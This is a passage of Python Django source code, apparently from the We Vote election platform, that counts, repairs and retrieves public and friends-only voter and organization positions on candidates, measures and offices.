contest_measure_we_vote_id__iexact=contest_measure_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
# if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
# public_position_list = public_position_list.filter(
# Q(stance=stance_we_are_looking_for) | Q(stance=PERCENT_RATING)) # | Q(stance=GRADE_RATING))
# else:
# public_position_list = public_position_list.filter(stance=stance_we_are_looking_for)
if stance_we_are_looking_for != ANY_STANCE:
public_position_list = public_position_list.filter(stance__iexact=stance_we_are_looking_for)
# Now filter out the positions that have a percent rating that doesn't match the stance_we_are_looking_for
if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
revised_public_position_list = []
for one_position in public_position_list:
if stance_we_are_looking_for == SUPPORT:
if one_position.stance == PERCENT_RATING:
if one_position.is_positive_rating(): # This was "is_support"
revised_public_position_list.append(one_position)
else:
revised_public_position_list.append(one_position)
elif stance_we_are_looking_for == OPPOSE:
if one_position.stance == PERCENT_RATING:
if one_position.is_negative_rating(): # This was "is_oppose"
revised_public_position_list.append(one_position)
else:
revised_public_position_list.append(one_position)
public_position_list = revised_public_position_list
total_count += len(public_position_list)
except Exception as e:
pass
# Friends-only Positions
try:
friends_only_position_list = PositionForFriends.objects.using('readonly').all()
friends_only_position_list = friends_only_position_list.exclude(voter_we_vote_id=None) # No we_vote_id
# As of Aug 2018 we are no longer using PERCENT_RATING
friends_only_position_list = friends_only_position_list.exclude(stance__iexact='PERCENT_RATING')
if positive_value_exists(contest_measure_id):
friends_only_position_list = friends_only_position_list.filter(contest_measure_id=contest_measure_id)
else:
friends_only_position_list = friends_only_position_list.filter(
contest_measure_we_vote_id__iexact=contest_measure_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
# if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
# friends_only_position_list = friends_only_position_list.filter(
# Q(stance=stance_we_are_looking_for) | Q(stance=PERCENT_RATING)) # | Q(stance=GRADE_RATING))
# else:
# friends_only_position_list = friends_only_position_list.filter(stance=stance_we_are_looking_for)
if stance_we_are_looking_for != ANY_STANCE:
friends_only_position_list = friends_only_position_list.filter(stance__iexact=stance_we_are_looking_for)
# Now filter out the positions that have a percent rating that doesn't match the stance_we_are_looking_for
if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
revised_friends_only_position_list = []
for one_position in friends_only_position_list:
if stance_we_are_looking_for == SUPPORT:
if one_position.stance == PERCENT_RATING:
if one_position.is_positive_rating(): # This was "is_support"
revised_friends_only_position_list.append(one_position)
else:
revised_friends_only_position_list.append(one_position)
elif stance_we_are_looking_for == OPPOSE:
if one_position.stance == PERCENT_RATING:
if one_position.is_negative_rating(): # This was "is_oppose"
revised_friends_only_position_list.append(one_position)
else:
revised_friends_only_position_list.append(one_position)
friends_only_position_list = revised_friends_only_position_list
total_count += len(friends_only_position_list)
except Exception as e:
pass
return total_count
def fetch_positions_count_for_voter_guide(self, organization_we_vote_id_list, google_civic_election_id, state_code,
retrieve_public_positions=True, stance_we_are_looking_for=ANY_STANCE):
# Don't proceed unless we have a correct stance identifier
if stance_we_are_looking_for not \
in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
return 0
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY_STANCE'
# which means we want to return all stances
# Don't proceed unless we have organization identifier and the election we care about
if not positive_value_exists(len(organization_we_vote_id_list)) and not \
positive_value_exists(google_civic_election_id):
return 0
position_count = 0
try:
if retrieve_public_positions:
position_on_stage_starter = PositionEntered
position_on_stage = PositionEntered()
else:
position_on_stage_starter = PositionForFriends
position_on_stage = PositionForFriends()
position_list = position_on_stage_starter.objects.using('readonly')
# As of Aug 2018 we are no longer using PERCENT_RATING
position_list = position_list.exclude(stance__iexact=PERCENT_RATING)
position_list = position_list.filter(organization_we_vote_id__in=organization_we_vote_id_list)
position_list = position_list.filter(google_civic_election_id=google_civic_election_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
# if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT:
# position_list = position_list.filter(
# Q(stance=stance_we_are_looking_for) | # Matches "is_support"
# (Q(stance=PERCENT_RATING) & Q(vote_smart_rating_integer__gte=66))
# ) # Matches "is_positive_rating"
# elif stance_we_are_looking_for == OPPOSE:
# position_list = position_list.filter(
# Q(stance=stance_we_are_looking_for) | # Matches "is_oppose"
# (Q(stance=PERCENT_RATING) & Q(vote_smart_rating_integer__lte=33))
# ) # Matches "is_negative_rating"
# else:
# position_list = position_list.filter(stance=stance_we_are_looking_for)
if stance_we_are_looking_for != ANY_STANCE:
position_list = position_list.filter(stance__iexact=stance_we_are_looking_for)
# Limit to positions in the last x years - currently we are not limiting
# position_list = position_list.filter(election_id=election_id)
position_count = position_list.count()
except Exception as e:
pass
return position_count
def migrate_position_network_scores_to_new_election_id(
self, we_vote_election_id, google_civic_election_id, change_now=False):
status = ""
success = False
we_vote_election_id = convert_to_int(we_vote_election_id)
google_civic_election_id = convert_to_int(google_civic_election_id)
position_network_scores_migrated = 0
if not positive_value_exists(we_vote_election_id) and not positive_value_exists(google_civic_election_id):
status += "MIGRATE_ALL_POSITION_NETWORK_SCORES-MISSING_VOTER_IDS "
results = {
'success': success,
'status': status,
'we_vote_election_id': we_vote_election_id,
'google_civic_election_id': google_civic_election_id,
'position_network_scores_migrated': position_network_scores_migrated,
}
return results
try:
score_queryset = PositionNetworkScore.objects.filter(google_civic_election_id=we_vote_election_id)
if positive_value_exists(change_now):
position_network_scores_migrated = score_queryset.update(
google_civic_election_id=google_civic_election_id)
status += 'ALL_POSITION_NETWORK_SCORES_MIGRATED '
else:
position_network_scores_migrated = score_queryset.count()
status += 'ALL_POSITION_NETWORK_SCORES_COUNTED '
success = True
except Exception as e:
status += 'FAILED migrate_position_network_scores_to_new_election_id ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(status, logger=logger)
results = {
'success': success,
'status': status,
'we_vote_election_id': we_vote_election_id,
'google_civic_election_id': google_civic_election_id,
'position_network_scores_migrated': position_network_scores_migrated,
}
return results
def positions_exist_for_voter(self, voter_we_vote_id):
# Don't proceed unless we have voter identifier
if not positive_value_exists(voter_we_vote_id):
return 0
position_count = 0
try:
position_on_stage_starter = PositionForFriends
position_list = position_on_stage_starter.objects.using('readonly').all()
position_list = position_list.filter(voter_we_vote_id__iexact=voter_we_vote_id)
position_count = position_list.count()
except Exception as e:
pass
if positive_value_exists(position_count):
return True
try:
position_on_stage_starter = PositionEntered
position_list = position_on_stage_starter.objects.using('readonly').all()
position_list = position_list.filter(voter_we_vote_id__iexact=voter_we_vote_id)
position_count = position_list.count()
except Exception as e:
pass
if positive_value_exists(position_count):
return True
return False
def remove_positions_ignored_by_voter(
self, positions_list, organizations_ignored_by_voter):
"""
We need a list of positions that were NOT made by an organization, public figure or friend
that this voter follows
:param positions_list:
:param organizations_ignored_by_voter:
:return:
"""
positions_ignored_by_voter = []
# Only return the positions if they are from organizations the voter follows
for position in positions_list:
# Some positions are for individual voters, so we want to filter those out
if position.organization_id \
and position.organization_id not in organizations_ignored_by_voter:
positions_ignored_by_voter.append(position)
return positions_ignored_by_voter
def remove_positions_unrelated_to_issues(self, positions_list, organizations_related_to_issue):
"""
We filter the list of organizations whose we_vote_id is present in organizations_related_to_issue
:param positions_list:
:param organizations_related_to_issue:
:return:
"""
positions_related_to_organization = []
for position in positions_list:
if position.organization_we_vote_id in organizations_related_to_issue:
positions_related_to_organization.append(position)
return positions_related_to_organization
def repair_all_positions_for_voter(self, incoming_voter_id=0, incoming_voter_we_vote_id=''):
"""
Make sure that every position owned by the voter has matching identifiers (voter_id, voter_we_vote_id,
organization_we_vote_id, organization_id).
:param incoming_voter_id:
:param incoming_voter_we_vote_id:
:return:
"""
if not positive_value_exists(incoming_voter_id) and not positive_value_exists(incoming_voter_we_vote_id):
results = {
'status': 'REPAIR_ALL_POSITIONS-MISSING_VOTER_ID_OR_WE_VOTE_ID ',
'success': False,
'repair_complete': False,
}
return results
status = ""
organization_manager = OrganizationManager()
voter_manager = VoterManager()
if positive_value_exists(incoming_voter_id):
results = voter_manager.retrieve_voter_by_id(incoming_voter_id)
else:
results = voter_manager.retrieve_voter_by_we_vote_id(incoming_voter_we_vote_id)
voter_id = 0
voter_we_vote_id = ""
organization_we_vote_id = ""
organization_id = 0
if results['voter_found']:
status += "REPAIR_POSITIONS-VOTER_FOUND "
voter = results['voter']
voter_id = voter.id
voter_we_vote_id = voter.we_vote_id
if not positive_value_exists(voter.linked_organization_we_vote_id):
# Heal the data
repair_results = organization_manager.repair_missing_linked_organization_we_vote_id(voter)
status += repair_results['status']
if repair_results['voter_repaired']:
voter = repair_results['voter']
organization_we_vote_id = voter.linked_organization_we_vote_id
if positive_value_exists(organization_we_vote_id):
# Look up the organization_id
organization_results = organization_manager.retrieve_organization_from_we_vote_id(
voter.linked_organization_we_vote_id)
if organization_results['organization_found']:
organization = organization_results['organization']
organization_id = organization.id
else:
status += results['status']
if not positive_value_exists(voter_id):
status += 'REPAIR_ALL_POSITIONS-MISSING_VOTER_ID '
results = {
'status': status,
'success': False,
'repair_complete': False,
}
return results
if not positive_value_exists(voter_we_vote_id):
status += 'REPAIR_ALL_POSITIONS-MISSING_VOTER_WE_VOTE_ID '
results = {
'status': status,
'success': False,
'repair_complete': False,
}
return results
if not positive_value_exists(organization_id):
status += 'REPAIR_ALL_POSITIONS-MISSING_ORGANIZATION_ID '
results = {
'status': status,
'success': False,
'repair_complete': False,
}
return results
if not positive_value_exists(organization_we_vote_id):
status += 'REPAIR_ALL_POSITIONS-MISSING_ORGANIZATION_WE_VOTE_ID '
results = {
'status': status,
'success': False,
'repair_complete': False,
}
return results
failure_counter = 0
############################
# Retrieve public positions
try:
# Retrieve by voter_id
public_positions_list_query = PositionEntered.objects.all()
public_positions_list_query = public_positions_list_query.filter(voter_id=voter_id)
public_positions_list = list(public_positions_list_query) # Force the query to run
for public_position in public_positions_list:
public_position_to_be_saved = False
try:
if public_position.voter_id != voter_id:
public_position.voter_id = voter_id
public_position_to_be_saved = True
if public_position.voter_we_vote_id != voter_we_vote_id:
public_position.voter_we_vote_id = voter_we_vote_id
public_position_to_be_saved = True
if public_position.organization_id != organization_id:
public_position.organization_id = organization_id
public_position_to_be_saved = True
if public_position.organization_we_vote_id != organization_we_vote_id:
public_position.organization_we_vote_id = organization_we_vote_id
public_position_to_be_saved = True
if public_position_to_be_saved:
public_position.save()
except Exception as e:
failure_counter += 1
# Retrieve by voter_we_vote_id
public_positions_list_query = PositionEntered.objects.all()
public_positions_list_query = public_positions_list_query.filter(
voter_we_vote_id__iexact=voter_we_vote_id)
public_positions_list = list(public_positions_list_query) # Force the query to run
for public_position in public_positions_list:
public_position_to_be_saved = False
try:
if public_position.voter_id != voter_id:
public_position.voter_id = voter_id
public_position_to_be_saved = True
if public_position.voter_we_vote_id != voter_we_vote_id:
public_position.voter_we_vote_id = voter_we_vote_id
public_position_to_be_saved = True
if public_position.organization_id != organization_id:
public_position.organization_id = organization_id
public_position_to_be_saved = True
if public_position.organization_we_vote_id != organization_we_vote_id:
public_position.organization_we_vote_id = organization_we_vote_id
public_position_to_be_saved = True
if public_position_to_be_saved:
public_position.save()
except Exception as e:
failure_counter += 1
# Retrieve by organization_id
public_positions_list_query = PositionEntered.objects.all()
public_positions_list_query = public_positions_list_query.filter(organization_id=organization_id)
# As of Aug 2018 we are no longer using PERCENT_RATING
public_positions_list_query = public_positions_list_query.exclude(stance__iexact=PERCENT_RATING)
public_positions_list = list(public_positions_list_query) # Force the query to run
for public_position in public_positions_list:
public_position_to_be_saved = False
try:
if public_position.voter_id != voter_id:
public_position.voter_id = voter_id
public_position_to_be_saved = True
if public_position.voter_we_vote_id != voter_we_vote_id:
public_position.voter_we_vote_id = voter_we_vote_id
public_position_to_be_saved = True
if public_position.organization_id != organization_id:
public_position.organization_id = organization_id
public_position_to_be_saved = True
if public_position.organization_we_vote_id != organization_we_vote_id:
public_position.organization_we_vote_id = organization_we_vote_id
public_position_to_be_saved = True
if public_position_to_be_saved:
public_position.save()
except Exception as e:
failure_counter += 1
# Retrieve by organization_we_vote_id
public_positions_list_query = PositionEntered.objects.all()
public_positions_list_query = public_positions_list_query.filter(
organization_we_vote_id__iexact=organization_we_vote_id)
# As of Aug 2018 we are no longer using PERCENT_RATING
public_positions_list_query = public_positions_list_query.exclude(stance__iexact=PERCENT_RATING)
public_positions_list = list(public_positions_list_query) # Force the query to run
for public_position in public_positions_list:
public_position_to_be_saved = False
try:
if public_position.voter_id != voter_id:
public_position.voter_id = voter_id
public_position_to_be_saved = True
if public_position.voter_we_vote_id != voter_we_vote_id:
public_position.voter_we_vote_id = voter_we_vote_id
public_position_to_be_saved = True
if public_position.organization_id != organization_id:
public_position.organization_id = organization_id
public_position_to_be_saved = True
if public_position.organization_we_vote_id != organization_we_vote_id:
public_position.organization_we_vote_id = organization_we_vote_id
public_position_to_be_saved = True
if public_position_to_be_saved:
public_position.save()
except Exception as e:
failure_counter += 1
except Exception as e:
results = {
'status': 'REPAIR-VOTER_POSITION_FOR_PUBLIC_SEARCH_FAILED ',
'success': False,
'repair_complete': False,
}
return results
############################
# Retrieve positions meant for friends only
try:
# Retrieve by voter_id
friends_positions_list_query = PositionForFriends.objects.all()
friends_positions_list_query = friends_positions_list_query.filter(voter_id=voter_id)
friends_positions_list = list(friends_positions_list_query) # Force the query to run
for friends_position in friends_positions_list:
friends_position_to_be_saved = False
try:
if friends_position.voter_id != voter_id:
friends_position.voter_id = voter_id
friends_position_to_be_saved = True
if friends_position.voter_we_vote_id != voter_we_vote_id:
friends_position.voter_we_vote_id = voter_we_vote_id
friends_position_to_be_saved = True
if friends_position.organization_id != organization_id:
friends_position.organization_id = organization_id
friends_position_to_be_saved = True
if friends_position.organization_we_vote_id != organization_we_vote_id:
friends_position.organization_we_vote_id = organization_we_vote_id
friends_position_to_be_saved = True
if friends_position_to_be_saved:
friends_position.save()
except Exception as e:
failure_counter += 1
# Retrieve by voter_we_vote_id
friends_positions_list_query = PositionForFriends.objects.all()
friends_positions_list_query = friends_positions_list_query.filter(
voter_we_vote_id__iexact=voter_we_vote_id)
friends_positions_list = list(friends_positions_list_query) # Force the query to run
for friends_position in friends_positions_list:
friends_position_to_be_saved = False
try:
if friends_position.voter_id != voter_id:
friends_position.voter_id = voter_id
friends_position_to_be_saved = True
if friends_position.voter_we_vote_id != voter_we_vote_id:
friends_position.voter_we_vote_id = voter_we_vote_id
friends_position_to_be_saved = True
if friends_position.organization_id != organization_id:
friends_position.organization_id = organization_id
friends_position_to_be_saved = True
if friends_position.organization_we_vote_id != organization_we_vote_id:
friends_position.organization_we_vote_id = organization_we_vote_id
friends_position_to_be_saved = True
if friends_position_to_be_saved:
friends_position.save()
except Exception as e:
failure_counter += 1
# Retrieve by organization_id
friends_positions_list_query = PositionForFriends.objects.all()
friends_positions_list_query = friends_positions_list_query.filter(organization_id=organization_id)
friends_positions_list = list(friends_positions_list_query) # Force the query to run
for friends_position in friends_positions_list:
friends_position_to_be_saved = False
try:
if friends_position.voter_id != voter_id:
friends_position.voter_id = voter_id
friends_position_to_be_saved = True
if friends_position.voter_we_vote_id != voter_we_vote_id:
friends_position.voter_we_vote_id = voter_we_vote_id
friends_position_to_be_saved = True
if friends_position.organization_id != organization_id:
friends_position.organization_id = organization_id
friends_position_to_be_saved = True
if friends_position.organization_we_vote_id != organization_we_vote_id:
friends_position.organization_we_vote_id = organization_we_vote_id
friends_position_to_be_saved = True
if friends_position_to_be_saved:
friends_position.save()
except Exception as e:
failure_counter += 1
# Retrieve by organization_we_vote_id
friends_positions_list_query = PositionForFriends.objects.all()
friends_positions_list_query = friends_positions_list_query.filter(
organization_we_vote_id__iexact=organization_we_vote_id)
friends_positions_list = list(friends_positions_list_query) # Force the query to run
for friends_position in friends_positions_list:
friends_position_to_be_saved = False
try:
if friends_position.voter_id != voter_id:
friends_position.voter_id = voter_id
friends_position_to_be_saved = True
if friends_position.voter_we_vote_id != voter_we_vote_id:
friends_position.voter_we_vote_id = voter_we_vote_id
friends_position_to_be_saved = True
if friends_position.organization_id != organization_id:
friends_position.organization_id = organization_id
friends_position_to_be_saved = True
if friends_position.organization_we_vote_id != organization_we_vote_id:
friends_position.organization_we_vote_id = organization_we_vote_id
friends_position_to_be_saved = True
if friends_position_to_be_saved:
friends_position.save()
except Exception as e:
failure_counter += 1
except Exception as e:
results = {
'status': 'REPAIR-VOTER_POSITION_FOR_FRIENDS_SEARCH_FAILED ',
'success': False,
'repair_complete': False,
}
return results
if positive_value_exists(failure_counter):
results = {
'status': 'VOTER_POSITION_LIST_PARTIALLY_REPAIRED ({failure_counter} failures) '
''.format(failure_counter=failure_counter),
'success': True,
'repair_complete': True,
}
else:
results = {
'status': 'VOTER_POSITION_LIST_FULLY_REPAIRED ',
'success': True,
'repair_complete': True,
}
return results
def retrieve_all_positions_for_candidate_campaign(self, retrieve_public_positions,
candidate_campaign_id, candidate_campaign_we_vote_id='',
stance_we_are_looking_for=ANY_STANCE, most_recent_only=True,
friends_we_vote_id_list=False,
organizations_followed_we_vote_id_list=False,
retrieve_all_admin_override=False,
read_only=False):
"""
We do not attempt to retrieve public positions and friend's-only positions in the same call.
:param retrieve_public_positions:
:param candidate_campaign_id:
:param candidate_campaign_we_vote_id:
:param stance_we_are_looking_for:
:param most_recent_only:
:param friends_we_vote_id_list: If this comes in as a list, use that list. If it comes in as False,
we can consider looking up the values if they are needed, but we will then need voter_device_id passed in too.
:param organizations_followed_we_vote_id_list: If this comes in as a list, use that list.
If it comes in as False, we can consider looking up the values if they are needed,
but we will then need voter_device_id passed in too.
:param retrieve_all_admin_override:
:param read_only:
:return:
"""
if stance_we_are_looking_for not \
in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
position_list = []
return position_list
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY_STANCE'
# which means we want to return all stances
if not positive_value_exists(candidate_campaign_id) and not \
positive_value_exists(candidate_campaign_we_vote_id):
position_list = []
return position_list
if retrieve_public_positions:
# If retrieving PositionEntered, make sure we have the necessary variables
if type(organizations_followed_we_vote_id_list) is list \
and len(organizations_followed_we_vote_id_list) == 0:
position_list = []
return position_list
else:
# If retrieving PositionForFriends, make sure we have the necessary variables
if not friends_we_vote_id_list and not retrieve_all_admin_override:
position_list = []
return position_list
elif type(friends_we_vote_id_list) is list and len(friends_we_vote_id_list) == 0:
position_list = []
return position_list
# Retrieve the support positions for this candidate_campaign_id
position_list = []
position_list_found = False
try:
if retrieve_public_positions:
# We intentionally do not use 'readonly' here since we need to save based on the results of this query
if read_only:
position_list_query = PositionEntered.objects.using('readonly').order_by('-date_entered')
else:
position_list_query = PositionEntered.objects.order_by('-date_entered')
retrieve_friends_positions = False
else:
# We intentionally do not use 'readonly' here since we need to save based on the results of this query
if read_only:
position_list_query = PositionForFriends.objects.using('readonly').order_by('-date_entered')
else:
position_list_query = PositionForFriends.objects.order_by('-date_entered')
retrieve_friends_positions = True
# As of Aug 2018 we are no longer using PERCENT_RATING
position_list_query = position_list_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(candidate_campaign_id):
position_list_query = position_list_query.filter(candidate_campaign_id=candidate_campaign_id)
else:
position_list_query = position_list_query.filter(
candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
# if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
# position_list_query = position_list_query.filter(
# Q(stance=stance_we_are_looking_for) | Q(stance=PERCENT_RATING)) # | Q(stance=GRADE_RATING))
# else:
# position_list_query = position_list_query.filter(stance=stance_we_are_looking_for)
if stance_we_are_looking_for != ANY_STANCE:
position_list_query = position_list_query.filter(stance__iexact=stance_we_are_looking_for)
# Only one of these blocks will be used at a time
if retrieve_friends_positions and friends_we_vote_id_list:
if type(friends_we_vote_id_list) is list and len(friends_we_vote_id_list) > 0:
# Find positions from friends. Look for we_vote_id case insensitive.
we_vote_id_filter = Q()
for we_vote_id in friends_we_vote_id_list:
we_vote_id_filter |= Q(voter_we_vote_id__iexact=we_vote_id)
position_list_query = position_list_query.filter(we_vote_id_filter)
if retrieve_public_positions and organizations_followed_we_vote_id_list:
if type(organizations_followed_we_vote_id_list) is list \
and len(organizations_followed_we_vote_id_list) > 0:
# Find positions from organizations voter follows.
we_vote_id_filter = Q()
for we_vote_id in organizations_followed_we_vote_id_list:
we_vote_id_filter |= Q(organization_we_vote_id__iexact=we_vote_id)
position_list_query = position_list_query.filter(we_vote_id_filter)
# Limit to positions in the last x years - currently we are not limiting
# position_list = position_list.filter(election_id=election_id)
position_list = list(position_list_query)
# Now filter out the positions that have a percent rating that doesn't match the stance_we_are_looking_for
if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
revised_position_list = []
for one_position in position_list:
if stance_we_are_looking_for == SUPPORT:
if one_position.stance == PERCENT_RATING:
if one_position.is_positive_rating(): # This was "is_support"
revised_position_list.append(one_position)
else:
revised_position_list.append(one_position)
elif stance_we_are_looking_for == OPPOSE:
if one_position.stance == PERCENT_RATING:
if one_position.is_negative_rating(): # This was "is_oppose"
revised_position_list.append(one_position)
else:
revised_position_list.append(one_position)
position_list = revised_position_list
if len(position_list):
position_list_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
# If we have multiple positions for one org, we only want to show the most recent.
if most_recent_only:
if position_list_found:
if len(position_list) > 1:
position_list_filtered = self.remove_older_positions_for_each_org(position_list)
else:
position_list_filtered = position_list
else:
position_list_filtered = []
else:
position_list_filtered = position_list
if position_list_found:
return position_list_filtered
else:
position_list_filtered = []
return position_list_filtered
def retrieve_all_positions_for_contest_measure(self, retrieve_public_positions,
contest_measure_id, contest_measure_we_vote_id,
stance_we_are_looking_for,
most_recent_only=True,
friends_we_vote_id_list=False,
organizations_followed_we_vote_id_list=False,
read_only=False):
"""
:param retrieve_public_positions:
:param contest_measure_id:
:param contest_measure_we_vote_id:
:param stance_we_are_looking_for:
:param most_recent_only:
:param friends_we_vote_id_list: If this comes in as a list, use that list. If it comes in as False,
we can consider looking up the values if they are needed, but we will then need voter_device_id passed in too.
:param organizations_followed_we_vote_id_list: If this comes in as a list, use that list.
If it comes in as False, we can consider looking up the values if they are needed,
but we will then need voter_device_id passed in too.
:param read_only:
:return:
"""
if stance_we_are_looking_for not \
in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
position_list = []
return position_list
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY' which means we want to return
# all stances
if not positive_value_exists(contest_measure_id) and not \
positive_value_exists(contest_measure_we_vote_id):
position_list = []
return position_list
if retrieve_public_positions:
# If retrieving PositionEntered, make sure we have the necessary variables
if type(organizations_followed_we_vote_id_list) is list \
and len(organizations_followed_we_vote_id_list) == 0:
position_list = []
return position_list
else:
# If retrieving PositionForFriends, make sure we have the necessary variables
if not friends_we_vote_id_list:
position_list = []
return position_list
elif type(friends_we_vote_id_list) is list and len(friends_we_vote_id_list) == 0:
position_list = []
return position_list
# Retrieve the support positions for this contest_measure_id
position_list = []
position_list_found = False
try:
if retrieve_public_positions:
# We intentionally do not use 'readonly' here since we need to save based on the results of this query
if read_only:
position_list_query = PositionEntered.objects.using('readonly').order_by('-date_entered')
else:
position_list_query = PositionEntered.objects.order_by('-date_entered')
retrieve_friends_positions = False
else:
# We intentionally do not use 'readonly' here since we need to save based on the results of this query
if read_only:
position_list_query = PositionForFriends.objects.using('readonly').order_by('-date_entered')
else:
position_list_query = PositionForFriends.objects.order_by('-date_entered')
retrieve_friends_positions = True
# As of Aug 2018 we are no longer using PERCENT_RATING
position_list_query = position_list_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(contest_measure_id):
position_list_query = position_list_query.filter(contest_measure_id=contest_measure_id)
else:
position_list_query = position_list_query.filter(
contest_measure_we_vote_id__iexact=contest_measure_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
if stance_we_are_looking_for != ANY_STANCE:
# If we passed in the stance "ANY" it means we want to not filter down the list
position_list_query = position_list_query.filter(stance__iexact=stance_we_are_looking_for)
# NOTE: We don't have a special case for
# "if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE"
# for contest_measure (like we do for candidate_campaign) because we don't have to deal with
# PERCENT_RATING data with measures
# Only one of these blocks will be used at a time
if retrieve_friends_positions and friends_we_vote_id_list is not False:
# Find positions from friends. Look for we_vote_id case insensitive.
we_vote_id_filter = Q()
for we_vote_id in friends_we_vote_id_list:
we_vote_id_filter |= Q(voter_we_vote_id__iexact=we_vote_id)
position_list_query = position_list_query.filter(we_vote_id_filter)
if retrieve_public_positions and organizations_followed_we_vote_id_list is not False:
# Find positions from organizations voter follows.
we_vote_id_filter = Q()
for we_vote_id in organizations_followed_we_vote_id_list:
we_vote_id_filter |= Q(organization_we_vote_id__iexact=we_vote_id)
position_list_query = position_list_query.filter(we_vote_id_filter)
# Limit to positions in the last x years - currently we are not limiting
# position_list = position_list.filter(election_id=election_id)
# We don't need to filter out the positions that have a percent rating that doesn't match
# the stance_we_are_looking_for (like we do for candidates)
position_list = list(position_list_query)
if len(position_list):
position_list_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
# If we have multiple positions for one org, we only want to show the most recent.
if most_recent_only:
if position_list_found:
if len(position_list) > 1:
position_list_filtered = self.remove_older_positions_for_each_org(position_list)
else:
position_list_filtered = position_list
else:
position_list_filtered = []
else:
position_list_filtered = position_list
if position_list_found:
return position_list_filtered
else:
position_list_filtered = []
return position_list_filtered
def retrieve_all_positions_for_contest_office(self, retrieve_public_positions,
contest_office_id, contest_office_we_vote_id,
stance_we_are_looking_for,
most_recent_only=True, friends_we_vote_id_list=False,
read_only=False):
if stance_we_are_looking_for not \
in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
position_list = []
return position_list
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY' which means we want to return
# all stances
if not positive_value_exists(contest_office_id) and not \
positive_value_exists(contest_office_we_vote_id):
position_list = []
return position_list
# If retrieving PositionForFriends, make sure we have the necessary variables
if not retrieve_public_positions:
if not friends_we_vote_id_list:
position_list = []
return position_list
elif type(friends_we_vote_id_list) is list and len(friends_we_vote_id_list) == 0:
position_list = []
return position_list
# Retrieve the support positions for this contest_office_id
position_list_found = False
try:
if retrieve_public_positions:
if read_only:
position_list_query = PositionEntered.objects.using('readonly').order_by('-date_entered')
else:
# We intentionally do not use 'readonly' here for when we save based on the results of this query
position_list_query = PositionEntered.objects.order_by('-date_entered')
retrieve_friends_positions = False
else:
if read_only:
position_list_query = PositionForFriends.objects.using('readonly').order_by('-date_entered')
else:
# We intentionally do not use 'readonly' here for when we save based on the results of this query
position_list_query = PositionForFriends.objects.order_by('-date_entered')
retrieve_friends_positions = True
# As of Aug 2018 we are no longer using PERCENT_RATING
position_list_query = position_list_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(contest_office_we_vote_id):
position_list_query = position_list_query.filter(
contest_office_we_vote_id__iexact=contest_office_we_vote_id)
else:
position_list_query = position_list_query.filter(contest_office_id=contest_office_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
if stance_we_are_looking_for != ANY_STANCE:
# If we passed in the stance "ANY" it means we want to not filter down the list
position_list_query = position_list_query.filter(stance__iexact=stance_we_are_looking_for)
# NOTE: We don't have a special case for
# "if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE"
# for contest_office (like we do for candidate_campaign) because we don't have to deal with
# PERCENT_RATING data with measures
if retrieve_friends_positions and friends_we_vote_id_list is not False:
# Find positions from friends. Look for we_vote_id case insensitive.
we_vote_id_filter = Q()
for we_vote_id in friends_we_vote_id_list:
we_vote_id_filter |= Q(voter_we_vote_id__iexact=we_vote_id)
position_list_query = position_list_query.filter(we_vote_id_filter)
# Limit to positions in the last x years - currently we are not limiting
# position_list = position_list.filter(election_id=election_id)
# We don't need to filter out the positions that have a percent rating that doesn't match
# the stance_we_are_looking_for (like we do for candidates)
position_list = list(position_list_query)
if len(position_list):
position_list_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
# If we have multiple positions for one org, we only want to show the most recent.
if most_recent_only:
if position_list_found:
position_list_filtered = self.remove_older_positions_for_each_org(position_list)
else:
position_list_filtered = []
else:
position_list_filtered = position_list
if position_list_found:
return position_list_filtered
else:
position_list_filtered = []
return position_list_filtered
def refresh_cached_position_info_for_election(self, google_civic_election_id, state_code=''):
position_manager = PositionManager()
success = True
status = ""
force_update = True
public_positions_updated = 0
friends_only_positions_updated = 0
offices_dict = {}
